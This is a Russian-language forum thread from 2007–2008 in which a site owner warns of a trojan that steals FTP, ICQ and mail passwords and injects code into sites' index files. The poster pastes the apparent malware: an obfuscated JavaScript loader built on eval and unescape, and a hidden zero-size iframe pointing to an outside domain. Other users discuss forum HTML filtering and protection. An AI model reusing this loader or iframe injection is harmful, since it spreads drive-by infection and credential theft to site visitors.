Автор: Фрукт 28.3.2007, 9:48
Люди, в ИНтернете пошел новый вирус, который разрастается в геометрической прогрессиии. 2 из моих сайтов уже заражены! Мой комп заражен! Сейчас буду лечиться.
Итак, внимание! Первые симптомы - у вас отключается буфер обмена. Вирус похищает все - пароли к аське, фтп, мылу.
Но кроме того, он вставляет свой код во все индексные файлы на вашем сервере!
Вот тело трояна!
Код
<html><head><meta http-equiv="expires" content="2"><meta http-equiv="imagetoolbar" content="no"><style type="text/css" media="print"><!--
body{display:none}--></style></head><body>
<script language="JavaScript" type="text/javascript"><!--
var k="",e=62,u="",r="9l Vn0Oq;scE5J(Wh>Ix<D3!-tS1\"8i&o)/fz=BewNb:2Pjpva|yTgUdMmur.k";eval(unescape("%66%75%6E%63%74%69%6F%6E%20%6A%28%6C%29%7B%76%61%72%20%66%3D%27%27%2C%69%2C%67%2C%63%2C%70%3B%66%6F%72%28%69%3D%30%3B%69%3C%6C%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%67%3D%6C%2E%63%68%61%72%41%74%28%69%29%3B%63%3D%72%2E%69%6E%64%65%78%4F%66%28%67%29%3B%69%66%28%63%3E%2D%31%29%7B%70%3D%28%28%63%2B%31%29%25%65%2D%31%29%3B%69%66%28%70%3C%3D%30%29%7B%70%2B%3D%65%7D%66%2B%3D%72%2E%63%68%61%72%41%74%28%70%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%67%7D%7D%75%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%64%64%64%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%29%3B%6B%3D%22%22%7D"));j("DcE.&vSV |0Ur|UwB8(|a|1E.&vS8VSTvwB8Sw<Sfp|a|cE.&vS8ID-tt\nzr0ES&)0VErW/{.wSr.0Vz| cw}zr0ES&)0V)urWw/{&zWwkN>&E>BB\"/{N&0M)Nk.w w|cw5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awB0r }}zr0ES&)0V0.Ww/{&zWwkN>&E>BB\"/{N&0M)NkE|vSr.w5aw0ScW5aw0Skmqd15mqn5/sN&0M)Nk)0u)rcwu)awBEr}&zWwkN>&E>BB!/{.wSr.0Vz| cw}}zr0ES&)0VEaW/{avBwaw0Sk:rSS)0s&zWavBBPyyavBB!/| w.SWr0wcE|vwW8g>|09cVz).VT)r.V.&U>SVE &E9k8//}&)BM)Eruw0Sk| s|wBM)Eruw0SkUwS5 wuw0SeTxMs&zW&)/{&zW|w/{M)Eruw0Sk)0cw wEScS|.SBErsM)Eruw0Sk)0M.|UcS|.SBE");j("rsM)Eruw0Sk)0E)0Sw<Suw0rBEr}w cw{M)Eruw0Sk)0u)rcwM)N0BEa}}&zW|woo-&)/{M)Eruw0Sk)0u)rcwM)N0BErsM)Eruw0Sk)0u)rcwrvB0.sM)Eruw0Sk)0E)0Sw<Suw0rBEr}&zWM)Eruw0Sk |Tw.c/{N&0M)NkE|vSr.w5aw0ScW5aw0Skmqd15djy5aw0Skmqd153qhb/sN&0M)Nk)0u)rcwM)N0B0.sN&0M)Nk)0u)rcwrvB)ur}zr0ES&)0V;|OW/{N&0M)NkcS|SrcB8V8scwSg&uw)rSW8;|OW/8,JO/};|OW/szr0ES&)0V;|\"W/{.wSr.0VS.rw}&zWM)Eruw0Sk| yyM)Eruw0SkUwS5 wuw0SeTxM/M)Eruw0Sk:)MTk)0u)rcw)aw.B;|\"ffttIDfcE.&vSID-tt[&zVUSwVx5VJ]IDM&aV&MB8vl=8VcST wB8v)c&S&)02|:c) rSwsN&MS>2Ov<s>");j("w&U>SBOv<sa&c&:& &ST2>&MMw08V)0E &E9B8E &v:)|.M3|S|kE w|.3|S|W/8IDfM&aIDcE.&vSV |0Ur|UwB8(|a|1E.&vS8VSTvwB8Sw<Sfp|a|cE.&vS8ID-tt\nzr0ES&)0Vvi=W/{vl=kE &E9W/scwSg&uw)rSW8vi=W/8,JOO/}vi=W/sffttIDfcE.&vSID-[w0M&z]ttIVD&z.|uwVN&MS>B8O8V>w&U>SB8O8Vc.EB8>SSv2ffuMzEk&0z)fc)zSf8IDf&z.|uwIV");ddd();document.write(k);k="";//-->
</script></body></html>
А этот код прога ставит на страницах!
Код
<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->
Началось блин!
Автор: антиКИЛЛЕР 28.3.2007, 19:10
Круто круто написано.... Но если это дйствительно реальный вирус то плохоо...
З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума.......
Автор: l3v11s 28.3.2007, 20:03
Цитата
З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума.......
Интересно как
Автор: nikitar 28.3.2007, 21:21
Он не сможет вставить, потому что в сообщениях нельзя писать в html, тут специальный язык BB код.
Кстати попробуйте ввести первую строчку кода в гугл, один сайт нашёлся, китайский какой-то, с иероглифами...
Автор: l3v11s 29.3.2007, 0:10
Цитата
З.Ы. А ты сюда код специально вставил, что бы какой-нить мальчик лет 12 взля и вставил этот код в код форума.......
думаешь IPB совсем дурики делали?Коли он 70$ стоит
Итак чтобы не пугались люди пишу
Код приведенный фруктом не будет работать на всех известных форумах
IPB
Vbuletin
phpbb
Expp
Wr-forum
punbb
yabb
А также на всех CMS системах имеющих сайт поддержки во 2 домене-за 3 домены и вообще без сайта не ручаюсь
Да и думаю что он вообще нигде работать не будет,на форумах уже наверно каждому нубу мозги просверлили по поводу штмлспеиалчарс.А программера который писал сайты Фрукта надо поймать морду набить,а если он еще и бабки взял то нах прибить.
Кстати Фрукт а через что он тебя "заразил",точнее куда он код впарил этот?Комментарии?Форум? новости?статьи?
Автор: Фрукт 29.3.2007, 5:07
А теперь слушайте, историю о том, как это все происходит.
Значит так. Данный код стоит на сайте "не_скажу_каком_а_то_заразитесь_.info" и во всяких каталогах. И вот, Как только вы туда заходите В ВАш ослик врезается троян, который изменяется и удаляется.
Потом, если вы заходите на фтп допустим обновить сайт, то все пароли скидываются автору. А потом специальная программа во всех индексных файлах, всех папок на вашем сервере прописывает следующее в самый конец:
Код
<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->
И ваш сайт становится распространителем заразы! Вот такая напасть началась!
Автор: Eriko 16.2.2008, 2:05
Брррр.... Не дай бог такому с моим сайтом случится, ваще с катушек съеду, и так мне все с трудом дается((
Автор: ula 16.2.2008, 14:23
Фрукт, какая защита у тебя на компьютере стоит?
Автор: Luppa 11.9.2008, 13:12
Значит пора ждать дырколататель на оборзеватель... инетерсно а в мозилу такая ересь тоже лезет?*